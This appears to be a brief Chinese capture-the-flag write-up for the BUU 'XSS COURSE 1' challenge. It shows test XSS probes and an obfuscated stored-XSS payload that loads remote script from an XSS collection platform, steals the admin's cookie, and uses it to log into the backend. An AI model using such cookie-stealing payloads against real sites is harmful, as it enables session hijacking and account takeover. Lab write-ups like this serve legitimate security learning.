BUU XSS COURSE 1

打開網頁，發現有吐槽和登錄兩個窗口

嘗試登錄發現不行，也沒有注冊窗口，來到吐槽

 

輸入的內容會在給的地址中顯示出來

構造

<script>alert(1)</script>

 

 

訪問給的地址/#/view/afb178d8-47ea-4a7a-f9e1-c34d5ac3eef7，沒有發現內容

重新構造

<IMG SRC="javascript.:alert('XSS');">

 

 

 

 發現一個打不開的圖片，存在xss漏洞

 

靶機無法訪問外網，用內網xss平台，注冊一個賬號，創建“我的項目”

</textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.buuoj.cn%2F8sVXk7%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>

把xss代碼在“吐槽”提交以后，訪問一下給的地址，回到XSS平台的項目內容就可以看到兩個剛接收到的內容，其中有一個是管理員訪問。

利用管理員的cookie，以及來訪地址http://XXXXXXXXXXXXXXXXX.node3.buuoj.cn/backend/admin.php登錄即可得到flag